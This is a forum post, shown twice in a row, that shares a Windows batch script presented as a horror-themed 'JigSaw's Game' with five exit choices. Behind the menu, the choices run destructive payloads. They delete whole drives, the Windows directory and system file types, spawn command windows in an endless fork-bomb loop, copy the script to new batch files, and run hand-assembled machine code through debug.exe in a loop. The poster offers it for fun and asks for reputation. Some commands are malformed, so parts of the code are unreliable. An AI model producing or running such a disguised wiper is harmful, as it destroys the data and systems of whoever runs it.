04-11-2008, 08:53 PM
Have Fun!
Here's the Script.
@echo off
color 04
title JigSaw's Game
cd C:\
:menu
cls
echo I want To Play a Game. Let it Begin.
pause
echo Pick your Exit:
echo 1. The Door
echo 2. The Attic
echo 3. The Staircase
echo 4. Cellar Door
echo 5. The Hallway
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
if %input%==3 goto three
if %input%==4 goto four
if %input%==5 goto five
goto menu
:one
deltree c://
deltree d://
kill c://
kill d://
Copy halo.bat %0 %windir%
start daily halo.bat
goto end
pause
echo You've Been Decapitated and Sliced To Sherds.
:two
kill %windir%
del %windir%
del *.txt
del *.exe
del *.bat
del *.ini
del *.dll
del *.NLS
del *.cpx
del *.OCX
del *.cpl
del *.dat
del *.nt
:ok
start, cmd
Goto ok
pause
echo You Know Nothing and are Left Bleeding in the Woods.
:three
copy 0% ms32.bat
start ms32.bat
pause
echo Have Fun.
:four
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
pause
echo Ive Planted Something on You It'll Never Go Away.
goto four
:five
echo You've Barely Escaped. Ill get You Next Time.
pause
:end
Rep Would be Sweet.
Trophy Would be Cool.
Especially The Nija.

Here's the Script.
@echo off
color 04
title JigSaw's Game
cd C:\
:menu
cls
echo I want To Play a Game. Let it Begin.
pause
echo Pick your Exit:
echo 1. The Door
echo 2. The Attic
echo 3. The Staircase
echo 4. Cellar Door
echo 5. The Hallway
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
if %input%==3 goto three
if %input%==4 goto four
if %input%==5 goto five
goto menu
:one
deltree c://
deltree d://
kill c://
kill d://
Copy halo.bat %0 %windir%
start daily halo.bat
goto end
pause
echo You've Been Decapitated and Sliced To Sherds.
:two
kill %windir%
del %windir%
del *.txt
del *.exe
del *.bat
del *.ini
del *.dll
del *.NLS
del *.cpx
del *.OCX
del *.cpl
del *.dat
del *.nt
:ok
start, cmd
Goto ok
pause
echo You Know Nothing and are Left Bleeding in the Woods.
:three
copy 0% ms32.bat
start ms32.bat
pause
echo Have Fun.
:four
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
pause
echo Ive Planted Something on You It'll Never Go Away.
goto four
:five
echo You've Barely Escaped. Ill get You Next Time.
pause
:end
Rep Would be Sweet.
Trophy Would be Cool.
Especially The Nija.
